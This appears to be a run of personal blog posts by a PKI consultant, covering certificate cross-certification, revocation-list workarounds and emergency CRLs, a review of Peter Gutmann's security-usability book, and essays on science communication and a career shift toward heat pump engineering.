Cross Certification between two CA hierarchies, each comprising three levels. Within a hierarchy each CA issues a certificate for its subordinate CA (orange lines). In addition the middle-tier CAs in each hierarchy issue certificates to the Root CAs of the other hierarchy – effectively creating logical chains consisting of 4 CAs. Image credits mine.

Any CA on any level could on principle be cross-certified. It would be easier to cross-certificate the Root CA but then the full tree of CAs subordinate to it will also be certified (For the experts: I am not considering name or other constraints here). If a CA an intermediate level is issued the cross-certificate trust is limited to this branch.

Cross-Certification constitutes a bifurcation in the CA tree and its consequences can be as weird and sci-fi as this sounds. It means that two different paths exists that connect an end-entity certificate to a different Root CA. Which path is actually chosen depends on the application validating the certificate and the protocol involved in exchanging or collecting certificates.

In an SSL handshake (which happens if you access your blog via https: // yourblog.wordpress.com, using the certificate with that asterisk) happens if you access the web server is so kind to send the full certificate chain – usually excl. the Root CA – to the client. So the path finally picked by the client depends on the chain the server knows or that takes precedence at the server.

Cross-certification is usually done by CAs considered external, and it is expected that an application in the external world sees the path chaining to the External CAs.

Tongue-in-cheek I had once depicted the world of real PKI hierarchies and their relations as:

CA hierarchies in the real world.

CA hierarchies in the real world. Sort of. Image credits mine.

Weird things can happen if a web server is available on an internal network and accessible by the external world (…via a reverse proxy. I am assuming there is no deliberate termination of the SSL connection at the proxy – what I call a corporate-approved man-in-the-middle attack). This server knows the internal certificate chain and sends it to the external client – which does not trust the corresponding internal-only Root CA. But the chain sent in the handshake may take precedence over any other chain found elsewhere so the client throws an error.

How to Really Use “Cross-certification”

As confusing cross-certification is – it can be  used in a peculiar way to solve other PKI problems – those with applications that cannot deal with the validation of a hierarchy at all or who can deal with only a one-level hierarchy. This is interesting in particular in relation to devices such as embedded industry systems or iPhones.

Assuming that only the needed certificates can be safely injected to the right devices and that you really know what you are doing the fully pesky PKI hierarchy can be circumvented by providing an alternative Root CA certificate to the CA at the bottom of the hierarchy:

The real, full blown hierarchy is

  1. Root CA issued a root certificate for Root CA (itself). It contains the key 1234.
  2. Root CA issues a certificate to Some Other CA related to key 5678.

… then the shortcut hierarchy for “dumb devices” looks like:

  1. Some Other CA issues a root certificate to itself, thus to Subject named Some Other CA. The public key listed in this certificate is 5678 the same as in certificate (2) of the extended hierarchy.

Client certificates can then use either chain – the long chain including several levels or the short one consisting of a single CA only. Thus if certificates have been issued by the full-blown hierarchy they can be “dumbed-down to devices” by creating the “one-level hierarchy” in addition.

Names and Encoding

In the chain of certificates the Issuer field in the certificate of the Subordinate CA needs to be the same as the Subject field of the Root CA – just as the Subject field in my National ID certificate contains my name and the Issuer field that of the signing CA. And it depends on the application how names with be checked. In a global world, names are not simple ASCII strings anymore, but encoding matters.

Certificates are based on an original request sent by the subordinate CA, and this request most often contains the name – the encoded name. I have sometimes seen that CAs changed the encoding of the names when issuing the certificates, or they reshuffled the components of the name – the order of tags like organization and country. An application may except that or not, and the reasons for rejections can be challenging to troubleshoot if the application is running in a blackbox-style device.

Revocation List Headaches

Certificates (X.509) can be invalidated by adding their respective serial number to a blacklist. This list is – or actually: may – be checked by relying parties. So full-blown certificate validation comprises collecting all certificates in the chain up to a self-signed Root CA (Subject=Issuer) and then checking each blacklist signed by each CA in the chain for the serial number of the entity one level below:

Certificate Validation

Validation of a certificate chain (“path). You start from the bottom and locate both CA certificates and the revocation lists via URLs in each subordinate certificate. Image credits mine.

The downside: If the CRL isn’t available at all applications following the recommended practices will for example deny network access to thousands of clients. With infrastructure PKIs that means that e.g. access to WLAN or remote access via VPN will fail.

This makes desperate PKI architects (or rather the architects accountable for the application requiring certificate based logon) build all kinds of workarounds, such as switching off CRL checking in case of an emergency or configuring grace periods. Note that this is all heavily application dependent and has to be figured out and documented individually for emergencies for all VPN servers, exotic web servers, Windows domain controllers etc.

A workaround is imperative if a very important application is dependent on a CRL issued by an “external” certificates’ provider. If I would use my Austrian’s digital ID card’s certificate for logging on to server X, that server would need tp have a valid version of this CRL which only lives for 6 hours.

Certificate Revocation List

A Certificate Revocation List (CRL) looks similar to a certificate. It is a file signed the Certification Authority that also signed the certificates that might be invalidated via that CRL. From downloading this CRL frequently I conclude that it a current version is published every hour – so there are 5 hours of overlap.

The predicament is that CRLs may be cached for performance reasons. Thus if you publish short-lived CRLs frequently you might face “false negative” outages due to operational issues (web server down…) but if the CRL is too long-lived it does not serve its purpose.

Ideally, CRLs would be valid for a few days, but a current CRL would be published, say every day, AND you could delete the CRL at the validating application every day. That’s exactly how I typically try to configure it. VPN servers, for example, have allowed to delete the CRL cache for a long time and Windows has a supported way to do that since Vista. This allows for reasonable continuity but revocation information would still be current.

If you cannot control the CRL issuance process one workaround is: Pro-active fetching of the CRL in case it is published with an overlap – that is: the next CRL is published while the current one is still valid – and mirroring the repository in question.

As an aside: It is more difficult as it sounds to give internal machines access to a “public” external URL. Machines not necessarily use the proxy server configured for user (which cause false positive results – Look, I tested it by accessing it in the browser and it works), and/or machines in the servers’ network are not necessarily allowed to access “the internet”.

CRLs might also simply be too big – for some devices with limited processing capabilities. Some devices of a major vendor used to refuse to process CRLs larger than 256kB. The CRL associated with my sample certificate is about 700kB:

LDAP CDP URL

How the revocation is located – via a URL embedded in the certificate. For the experts: OCSP is supported, too, and it is the recommended method. However considering older devices it might be necessary to resort to CRLs.

CRL Details - Blacklist

The actual blacklist part of the CRL. The scrollbar is misleading – the list contains about 20.000 entries (best viewed with openssl or Windows certutil).

Emergency Revocation List

In case anything goes wrong – HSM inaccessible, passwords lost, datacenter 1 flooded abd backup datacenter 2 destroyed by a meteorite – there is one remaining option to keep PKI-dependent applications happy:

Prepare a revocation list in advance whose end of life (NextUpdate date) is after the end of validity of the CA certificate. In contrast to any backup of key material this CRL can be “backed up” by pasting the BASE64 string to the documentation as it does not contain sensitive information.

In an emergency this CRL will be published to the locations embedded in certificates. You will never be able to revoke anything anymore as CRLs might be cached – but business continuity is secured.

Emergency CRL

An Emergency CRL for my home-grown CA. It seems 9999 days is the maximum I can use with Windows certutil. Actually, the question of How many years should the lifetime be so that I will not be bothered anymore until retirement? comes up often in relation to all kinds of validity dates.

What I Never Wanted to Know about Security but Found Extremely Entertaining to Read

This is in praise of Peter Gutmann‘s book draft Engineering Security, and the title is inspired by his talk Everything You Never Wanted to Know about PKI but were Forced to Find Out.

Chances are high that any non-geek reader is already intimidated by the acronym PKI – sharing the links above on LinkedIn I have been asked Oh. Wait. What the %&$%^ is PKI??

This reaction is spot-on as this post is more about usability and perception of technology by end-users despite or because I have worked for more than 10 years at the geeky end of Public Key Infrastructure. In summary, PKI is a bunch (actually a ton) of standards that should allow for creating the electronic counterparts of signatures, of issuing passports, of transferring data in locked cabinets. It should solve all security issues basically.

The following images from Peter Gutmann’s book  might invoke some memories.

Security warnings designed by geeks look like this:

Peter Gutmann, Engineering Security, certificate warning - What the developers wrote

Peter Gutmann, Engineering Security, book draft, available at https://www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf, p.167. Also shown in Things that Make us Stupid, https://www.cs.auckland.ac.nz/~pgut001/pubs/stupid.pdf, p.3.

As a normal user, you might rather see this:

Peter Gutmann, Engineering Security, certificate warning - What the user sees

Peter Gutmann, Engineering Security, book draft, available at https://www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf, p.168.

The funny thing was that I picked this book to take a break from books on psychology and return to the geeky stuff – and then I was back to all kinds of psychological biases and Kahneman’s Prospect Theory for example.

What I appreciate in particular is the diverse range of systems and technologies considered – Apple, Android, UNIX, Microsoft,…, all evaluated agnosticly, plus a diverse range of interdisciplinary research considered. Now that’s what I call true erudition with a modern touch. Above all, I enjoyed the conversational and irreverent tone – I have never started reading a book for technical reasons and then was not able to put it down because it was so entertaining.

My personal summary – which resonates a lot with my experience – is:
On trying to make systems more secure you might not only make them more unusable and obnoxious but also more insecure.

A concise summary is also given in Gutmann’s talk Things that Make Us Stupid. I liked in particular the ignition key as a real-world example for a device that is smart and easy-to-use, and providing security as a by-product – very different from interfaces of ‘security software’.

Peter Gutmann is not at all siding with ‘experts’ who always chide end-users for being lazy and dumb – writing passwords down and stick the post-its on their screens – and who state that all we need is more training and user awareness. Normal users use systems to get their job done and they apply risk management in an intuitive way: Should I waste time in following an obnoxious policy or should I try to pass that hurdle as quick as possible to do what I am actually paid for?

Geeks are weird – that’s a quote from the lecture slides linked above. Since Peter Gutmann is an academic computer scientist and obviously a down-to-earth practitioner with ample hands-on experience – which would definitely qualify him as a Geek God – his critique is even more convincing. In the book he quotes psychological research which prove that geeks really think different (as per standardized testing of personality types). Geeks constitute a minority of people (7%) that tend to take decisions – such as Should I click that pop-up? – in a ‘rational’ manner, as the simple and mostly wrong theories on decision making have proposed. One example Gutmann uses is testing for basic understanding of logics, such as Does ‘All X are Y’ imply ‘Some X are Y’? Across cultures the majority of people thinks that this is wrong.

Normal people – and I think also geeks when they don’t operate in geek mode, e.g. in the wild, not in their programmer’s cave – fall for many so-called fallacies and biases.

Our intuitive decision making engine runs on autopilot and we get conditioned to click away EULAs, or next-next-finish the dreaded install wizards, or click away pop-ups, including the warnings. As users we don’t generate testable hypotheses or calculate risks but act unconsciously based on our experience what had worked in the past – and usually the click-away-anything approach works just fine. You would need US navy-style constant drilling in order to be alert enough not to fall for those fallacies. This does exactly apply to anonymous end users using their home PCs to do online-banking.

Security indicators like padlocks and browser address bar colors change with every version of popular browsers. Not even tech-savvy users are able to tell from those indicators if they are ‘secure’ now. But what it is extremely difficult: Users would need to watch out for the lack of an indicator (that’s barely visible when it’s there). And we are – owing to confirmation bias – extremely bad at spotting the negative, the lack of something. Gutmann calls this the Simon Says problem.

It is intriguing to see how biases about what ‘the others’ – the users or the attackers – would do enter technical designs. For example it is often assumed that a client machine or user who has authenticated itself is more trustworthy – and servers are more vulnerable to a malformed packet sent after successful authentication. In the Stuxnet attack digitally signed malware (signed by stolen keys) that has been used – ‘if it’s signed it has to be secure’.

To make things worse users are even conditioned for ‘insecure’ behavior: When banks use all kinds fancy domain names to market their latest products, they lure their users into clicking on links to that fancy sites in e-mails and have them logon with their banking user accounts via these sites they train users to fall for phishing e-mails – despite the fact that the same e-mails half-heartedly warn about clicking arbitrary links in e-mails.

I believe in relation to systems like PKI – that require you run some intricate procedures every few years only (these are called ceremonies for a reason) – also admins should also be considered ‘users’.

I have spent many hours in discussing proposed security features like Passwords need to be impossible to remember and never written down with people whose job it is to audit, draft policies, and read articles on what Gutmann calls conference-paper-attacks all the day. These are not the people who have to run systems, deal with helpdesk calls or costs, and with requests from VIP users as top level managers who had on the one hand been extremely paranoid about system administrators sniffing their e-mails but yet on the other hand need instant 24/7 support with recovery of encrypted e-mails (This should be given a name like the Top Managers’ Paranoia Paradox)

As a disclaimer I’d like to add that I don’t underestimate cyber security threats, risk management, policies etc. It is probably the current media hype on governments spying on us that makes me advocate a contrarian view.

I could back this up by tons of stories, many of them too good to be made up (but unfortunately NDA-ed): security geeks in terms of ‘designers’ and ‘policy authors’ often underestimate time and efforts required in running their solutions on a daily basis. It is often the so-called trivial and simple things that go wrong, such as: The documentation of that intricate process to be run every X years cannot be found, or the only employee who really knew about the interdependencies is long gone, or allegedly simple logistics that go wrong (Now we are locked in the secret room to run the key ceremony… BTW did anybody think of having the media ready to install the operating system on that high secure isolated machine?).

A large European PKI setup failed (it made headlines) because the sacred key of a root certification authority had been destroyed – which is the expected behavior for so-called Hardware Security Modules when they are tampered with or at least the sensors say so, and there was no backup. The companies running the project and running operations blamed each other.

I am not quoting this to make fun of others – I made enough blunders myself. The typical response to this often is: Projects or operations have been badly managed and you just need to throw more people and money on them to run secure systems in a robust and reliable way. This might be true but it does simply not reflect the typical budget, time constraints, and lack of human resources typical IT departments of corporations have to deal with.

There is often a very real, palpable risk of trading off business continuity and availability (that is: safety) for security.

Again I don’t want to downplay risks associated with broken algorithms and the NSA reading our e-mail. But as Peter Gutmann points out cryptography is the last thing an attacker would target (even if a conference-paper attack had shown it is broken) – the implementation of cryptography rather guides attackers along the lines of where not to attack. Just consider the spectacular recent ‘hack’ of a prestigious one-letter Twitter account which was actually blackmailing the user after having gained control over a user’s custom domain through social engineering – of most likely underpaid call-center agents who had to face that dilemma of meeting the numbers in terms of customer satisfaction versus following the security awareness training they might have had.

Needless to say, encryption, smart cards, PKI etc. would not have prevented that type of attack.

Peter Gutmann says about himself he is throwing rocks at PKIs, and I believe you can illustrate a particularly big problem using a perfect real-live metaphor: Digital certificates are like passports or driver licenses to users – signed by a trusted agency.

Now consider the following: A user might commit a crime and his driver license is seized. PKI’s equivalent of that seizure is to have the issuing agency publishing a black list regularly, listing all the bad guys. Police officers on the road need to have access to that blacklist in order to check drivers’ legitimacy. What happens if a user isn’t blacklisted but the blacklist publishing service is not available? The standard makes this check optional (as many other things which is the norm when an ancient standard is retrofitted with security features) but let’s assume the police app follows the recommendation what they SHOULD do.  If the list is unavailable the user is considered and alleged criminal and has to exit the car.

You could also imagine something similar happening to train riders who have printed out an online ticket that cannot be validated (e.g. distinguished from forgery) by the conductor due to a failure in the train’s IT systems.

Any ’emergency’ / ‘incident’ related to digital certificates I was ever called upon to support with was related to false negative blocking users from doing what they need to do because of missing, misconfigured or (temporarily) unavailable certificate revocation lists (CRLs). The most important question in PKI planning is typically how to workaround or prevent inaccessible CRLs. I am aware of how petty this problem may appear to readers – what’s the big deal in monitoring a web server? But have you ever noticed how many alerts (e.g. via SMS) a typical administrator gets – and how many of them are false negatives? When I ask what will happen if the PKI / CRL signing / the web server breaks on Dec. 24 at 11:30 (in a European country) I am typically told that we need to plan for at least some days until recovery. This means that revocation information on the blacklist will be stale, too, as CRLs can be cached for performance reasons.

As you can imagine most corporations rather tend to follow the reasonable approach of putting business continuity over security so they want to make sure that a glitch in the web server hosting that blacklists will not stop 10.000 employees from accessing the wireless LAN, for example. Of course any weird standard can be worked around given infinite resources. The point I wanted to make was that these standards have been designed having something totally different in mind, by PKI Theologians in the 1980s.

Admittedly though, digitally certificates and cryptography make for a great playground for geeks. I think I was a PKI theologian myself many years ago until I rather morphed in what I call anti-security consultant tongue-in-cheek – trying to help users (and admins) to keep on working despite new security features. I often advocated for not using certificates and proposing alternative approaching boiling down the potential PKI project to a few hours of work, against the typical consultant’s mantra of trying to make yourself indispensable in long-term projects and by designing blackboxes the client will never be able to operate on his own. Not only because of the  PKI overhead but because alternatives were as secure – just not as hyped.

So in summary I am recommending Peter Gutmann’s terrific resources (check out his Crypto Tutorial, too!) to anybody who is torn between geek enthusiasm for some obscure technology and questioning its value nonetheless.

Rusty Padlock

No post on PKI, certificates and key would be complete without an image like this.I found the rusty one particularly apt here. (Wikimedia, user Garretttaggs)

On Science Communication

In a parallel universe I might work as a science communicator.

Having completed my PhD in applied physics I wrote a bunch of job applications, one of them being a bit eccentric: I applied at the Austrian national public service broadcaster. (According to Wikipedia Austria was the last country in continental Europe after Albania to allow nationwide private television broadcasting).

I deleted all those applications that would me make me blush today. In my application letters I referred to the physicist’s infamous skills in analytical thinking, mathematical modeling and optimization of technical processes. Skills that could be applied to basically anything – from inventing novel tractor beam generators for space ships to automatically analyzing emoticons in Facebook messages.

If I would have been required to add a social-media-style tagline in these dark ages of letters on paper and snail mail I probably would have tagged myself as combining anything, in particular experimental and theoretical physics and, above all, communicating science to different audiences. If memory serves I used the latter argument in my pitch to the broadcaster.

I do remember the last sentence of that pivotal application letter:

I could also imagine working in front of a camera.

Yes, I really did write that – based on a ‘media exposure’ of having appeared on local TV for some seconds.

This story was open-ended: I did not receive a reply until three months later, and at that time I was already employed as a materials scientist in R&D.

In case job-seeking graduate students are reading this: It was imperative that I added some more substantial arguments to my letters, that is: hands-on experience – maintaining UV excimer lasers, knowing how to handle liquid helium, decoding the output of X-ray diffractometers, explaining accounting errors to auditors of research grant managing agencies. Don’t rely on the analytical skills pitch for heaven’s sake.

I pushed that anecdote deep down into the netherworlds of my subconsciousness. Together with some colleagues I ritually burnt items reminiscent of university research and of that gruelling job hunt, such as my laboratory journals and print-outs of job applications. This spiritual event was eventually featured on a German proto-blog website and made the German equivalent of ritual burning the top search term for quite a while.

However, today I believe that the cheeky pitch to the broadcaster had anticipated my working as a covert science communicator:

Fast-forward about 20 years and I am designing and implementing Public Key Infrastructures at corporations. (Probably in vain, according to the recent reports about NSA activities). In such projects I covered anything from giving the first concise summary to the CIO (Could you explain what PKI is – in just two Powerpoint slides?) to spending nights in the data center – migrating to the new system together with other security nerds, fueled by pizza and caffeine.

The part I enjoyed most in these projects was the lecture-style introduction (the deep dive in IT training lingo) to the fundamentals of cryptography. Actually these workshops were the nucleus of a lecture I gave at a university later. I aimed at combining anything: Mathematical algorithms and anecdotes (notes from the field) about IT departments who locked themselves out of the high-security systems, stunning history of cryptography and boring  EU legislation, vendor-agnostic standards and the very details of specific products.

Usually the feedback was quite good though once the comment in the student survey read:

Her lectures are like a formula one race without pitstops.

This was a lecture given in English, so it is most likely worse when I talk in German. I guess, Austrian Broadcasting would have forced me to take a training in professional speaking.

As a Subversive Element I indulged in throwing in some slides about quantum cryptography – often this was considered the most interesting part of the presentation, second to my quantum physics stand-up edutainment in coffee breaks. The downside of that said edutainment were questions like: And … you turned down *that* for designing PKIs?

I guess I am obsessed with combining consulting and education. Note that I am referring to consulting in terms of working hands-on with a client, for example troubleshooting why 1000 users can’t logon to their computers. I did not want to be a stereotypical management consultant’s churning out sleek Powerpoint slides and leaving silently before you need to get your hands dirty (Paraphrasing clients’ judgements of ‘predecessors’ in projects I had to fix).

It is easy to spot educational aspects in consulting related to IT security or renewable energy. There are people who want to know how stuff really works, in particular if that helps to make yourself less dependent on utilities or on Russian gas pipelines, or to avoid being stalked by the NSA.

But now I have just started a new series of posts on Quantum Field Theory. Why on earth do I believe that this is useful or entertaining? Considering in particular that I don’t plan to cover leading edge research: I will not comment on hot new articles in Nature about stringy Theories of Everything.

I stubbornly focus on that part of science I have really grasped myself in depth – as an applied physicist slowly (re-)learning theory now. I will never reach the frontier of knowledge in contemporary physics in my lifetime. But, yes, I am guilty of sharing sensationalist physics nuggets on social media at times – and I jumped on the Negative Temperature Train last year.

My heart is in reading old text books, and in researching old patents describing inventions of the pre-digital era. If you asked me what I would save if my house is on fire I’d probably say I’d snatch the six volumes of text books in theoretical physics my former physics professor, Wilhelm Macke, has written in the 1960s. He had been the last graduate student supervised by Werner Heisenberg. Although I picked experimental physics eventually I still consider his lectures the most exceptional learning experience I ever had in life.

I have enjoyed wading through mathematical derivations ever since. Mathy physics has helped me to save money on life coaches or other therapists when I was a renowned, but nearly burnt-out ‘travelling knowledge worker’ AKA project nomad. However, I understand that advanced calculus is not everybody’s taste – you need to invest quite some time and efforts until you feel these therapeutic effects.

Yet, I aim at conveying that spirit, although I had been told repeatedly by curriculum strategists in higher education that if anything scares people off pursuing a tech or science degree – in particular, as a post-graduate degree – it is too much math, including reference to mathy terms in plain English.

However, I am motivated by a charming book:

The Calculus Diaries: How Math Can Help You Lose Weight, Win in Vegas, and Survive a Zombie Apocalypse

by science writer Jennifer Ouellette. According to her website, she is a recovering English major who stumbled into science writing as a struggling freelance writer… and who has been avidly exploring her inner geek ever since. How could you not love her books? Jennifer is the living proof that you can overcome math anxiety or reluctance, or even turn that into inspiration.

Richard Feynman has given a series of lectures in 1964 targeted to a lay audience, titled The Character of Physical Law.

Starting from an example in the first lecture, the gravitational field, Feynman expounds how physics relates to mathematics in the second lecture – by the way also introducing the principle of least action as an alternative to tackle planetary motions, as discussed in the previous post.

It is also a test of your dedication as a Feynman fan as the quality of this video is low. Microsoft Research has originally brought these lectures to the internet – presenting them blended with additional background material (*) and a transcript.

You ought to wath the video now!

You may or may not agree with Feynman’s conclusion about mathematics as the language spoken by nature:

It seems to me that it’s like: all the intellectual arguments that you can make would not in any way – or very, very little – communicate to deaf ears what the experience of music really is.

[People like] me, who’s trying to describe it to you (but is not getting it across, because it’s impossible), we’re talking to deaf ears.

This is ironic on two levels, as first of all, if anybody could get it across – it was probably Feynman. Second, I agree to him. But I will still stick to my plan and continue writing about physics, trying to indulge in the mathy aspects, but not showing off the equations in posts. Did I mention this series is an experiment?

________________________________________

(*) Technical note: You had to use Internet Explorer and install Microsoft Silverlight when this was launched in 2009 – now it seems to work with Firefox as well. Don’t hold be liable if it crashes your computer though!

Trading in IT Security for Heat Pumps? Seriously?

Astute analysts of science, technology and the world at large noticed that my resume reads like a character from The Big Bang Theory. After all, an important tag used with this blog is cliché, and I am dead serious about theory and practice of combining literally anything.

[Edit in 2016: At the time of writing this post, this blog’s title was Theory and Practice of Trying to Combine Just Anything.]

Recently I have setup our so-called business blog and business facebook page, but I admit it is hard to recognize them as such. Our facebook tagline says (translated from German):

Professional Tinkerers. Heat Pump Freaks. Villagers. (Ex-) IT Guys.

People liked the page – probably due to expecting this page to turn out as one of my experimental web 2.0 ventures (I am trying hard to meet those expectations anyway).

But then one of my friends has asked:

Heat pumps instead of IT security – seriously?

Actually this is the pop-sci version: The true question included a lesser known term:
Heat pumps instead of PKI?

(1) PKI and IT Security

PKI means Public Key Infrastructure, and it is not as boring as the Wikipedia definition may sound. For more than ten years it way my mission to design, implement and troubleshoot PKI systems. The emphasis is on ‘systems’: PKI is about geeky cryptographic algorithms, hyper-paranoid risk management (Would the NSA be able to hack into this?) as well as about matching corporate politics and alleged or true risks with commercially feasible technical systems. Adding some management lingo it is about ‘technology, people, and processes’.

Full-blown PKI projects are for large corporations – so I was travelling a lot, although I was able to turn my services offerings from ‘working on site, doing time – whatever needs to be done’ (which is actually the common way to work as an expert freelance in IT) to ‘working mainly remote – working on very specific tasks only’. I turned into a PKI designer, firefighter and reviewer. I gave PKI workshops and an academic lecture about PKI for years.

There was nothing wrong with PKI as such: I enjoyed the geeky community of like-minded peers, and the business was self-running. The topic is hot. Just read your favorite tech newspaper’s articles on two-factor authentication or the like – both corporate compliance rules and new security threats related to cloud computing make PKI or related technologies being in demand a sure bet.

(2) Portfolio of Passions

I would like to borrow another author’s picture here: In The Monk and the Riddle: The Art of Creating a Life While Making a Living Randy Komisar – Silicon Valley virtual CEO – expounds how he dabbled in some creative ventures after having graduated, and how he finally embarked on a career as a lawyer. And how he saw his future unfolding before him – Associate, Senior… Partner. He could see the office doors lined up neatly, reflecting the ever progressing evolving of what we call career, and he quit his career as a lawyer.

In particular, I like Komisar’s definition of passion  that should not at confused with the new age-y approach of following your passion.

It is not about the passion, but about a portfolio of passion – don’t drive yourself crazy by trying to find THE passion once for all.

My personal portfolio had always comprised a whole lot – this blog has its name for a reason. Probably I will some day blog on all studies and master degree programs I had ever evaluated attending. When I was a teenager there were times when philosophy and literature scored higher than anything science-y.

So I had ended up in an obscure, but thought-after sub-branch of IT security. I have gone to great lengths in this blog to explain my transition from physics to IT. However, physics, science, and engineering never vanished from my radar for opportunities.

I wanted less reputation as the internationally renowned high-flyer in IT, and more hands-on down-to-earth work. Ironically, the fact that security is hot in the corporate world started to turn me off. I felt I stood at the wrong side of fence or of the negotiation table – as an effectively Anti-Security Consultant who helped productive business units to remain productive despite security and compliance policies. Probably worth a post of its own, but my favorite theory is: If you try to enforce policies beyond a certain limit, people will pour all their creativity into circumventing the processes and beating the system. And right they are because they could not do their jobs otherwise.

For many years a resource-consuming background process of soul-searching was concerned with checking various option from my portfolio of passions. I was looking for a profession that:

  • is based on technology that is not virtual, but allowing for utilizing my know-how in IT infrastructure and security as an add-on.
  • allows for working with clients whose sites can be reached by car – not by plane.
  • allows for self-consistency and authenticity: Practice what you preach / Turn your hobby into a job.
  • utilizes the infamous physicist’s analytical skills, that is combines (just anything): Theoretical calculations, hands-on engineering, managing the design of complex technical systems, dealing with customer requirements versus available technical solutions.

The last item is a pet topic of mine: As a physicist – even as an applied physicist – you have not been trained for a specific job. Physics is more similar to philosophy than to engineering in this respect. We are dilettantes in the best sense – and that is why many physicists end up in IT, management consulting or finance for example.

There are interdisciplinary fields of research that utilize physics via sort of mathematical analogs – think “Bose-Einstein condensation” in networking theory. According to another debatable theory of mine we have nearly blown up the financial system because of many former scientists working in finance – on the physics of wall street – who were more interesting in doing something that mathematically resembles physics than in the impact on the real world.

Solar collector. Image credits: punktwissen

Solar collector, optimized for harvesting ambient heat by convection in winter time. Image credits: Mine / Our German blog.

.

(3) And Now for Something Completely Different: Heat Pump Systems and Sustainability

Though am truly interested in foundations of physics, fascinated by the LHC, and even intrigued even by econophysics, I rather prefer to work on mundane applications of physics in engineering as long as it allows for working on a solution to a problem that really matters right now.

Such as the effective utilization of the limited resources available on our planet. Anyone who believes exponential growth can go on forever in a finite world is either a madman or an economist (Kenneth Boulding). I do not want to enter the debate on climate warming and I do not think it makes sense to attempt evangelizing people by ethical arguments. Why should we act in a more responsible way than all the generations before us? My younger self, traveling the globe by plane, would not have listened to that arguments either.

However, I think we are all – green or not – striving for personal and economic independence and autonomy: as individuals, as home owners, as businesses.

That’s what got me (us) interested in renewable energy some time ago, and we started working on our personal pilot project that finally turned into a research project / ‘garage start-up’.

We have finally come up with a concept of a heat pump system that uses an unconventional source of heat: The heat pump does not draw heat from ground, ground water or air, but from a large low temperature reservoir – a cistern, in a sense. Ambient heat is in turn transferred to the water tank by means of a solar collector. A simple collector built from hoses (as depicted above) works better than a flat plate collector that relies on heat transfer via radiation.

As with PKI, this is more interesting than it sounds, and it is really about combining just anything: Numerical simulations and building stuff, consulting and product development, scrutinizing product descriptions provided by vendors and dealing with industry standards. None of the components of the heat pump system is special – we did not invent a device defying the laws of physics – but is it the controlling logic that matters most.

I am going to extend the scope for combining anything even further: Having enrolled in a Master’s degree program in energy engineering in 2011, I will focus on smart metering in my master thesis. Future volatile electricity tariffs (communicated by intelligent meters) will play an important role in management and control of heat pump systems, and there are lots of security risks to be considered.

It is all about systems, interfaces, and connections – not only in social media and IT, but also in building technology and engineering. Actually, all of that is converging onto one big cloudy network (probably also subject to similar chaotic phenomena as the financial markets). I am determined to make some small contribution to that.

(4) Concluding and Confusing Remark

Now I feel like Achill and the Tortoise in Gödel, Escher, Bach(*) – in the chapter on pushing and popping through many levels of the story or the related dreamscape. I am not sure if I have reached the base level I had started from. This might be cliff-hanger.

(*) This is also a subtle tribute to the friend – and musician – mentioned above.

~~~

There should be an epilogue. Time-travelling back, from 2018, I am adding this comment. I think have never actually traded in anything for anything! Here I am, in 2018, and I am still doing PKI, in parallel to the heat pumps!